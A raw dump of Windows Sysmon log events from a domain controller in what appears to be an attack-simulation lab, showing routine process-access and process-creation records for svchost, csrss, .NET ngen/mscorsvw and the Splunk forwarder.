13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FD-6005-6303-00000000A301}1556C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91FD-6005-6303-00000000A301}1556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-91FD-6005-6303-00000000A301}1556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.885{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FD-6005-6203-00000000A301}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.885{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FD-6005-6203-00000000A301}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framewo
rk\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.479{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FD-6005-6103-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.463{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FD-6005-6103-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:49.463{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FD-6005-6103-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:50.807{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FE-6005-6703-00000000A301}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.791{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FE-6005-6703-00000000A301}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:50.791{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FE-6005-6703-00000000A301}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:50.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FE-6005-6603-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.526{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FE-6005-6603-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:50.526{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FE-6005-6603-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:50.215{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FE-6005-6503-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.198{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FE-6005-6503-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:50.198{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FE-6005-6503-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:50.151{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FE-6005-6403-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.135{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FE-6005-6403-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
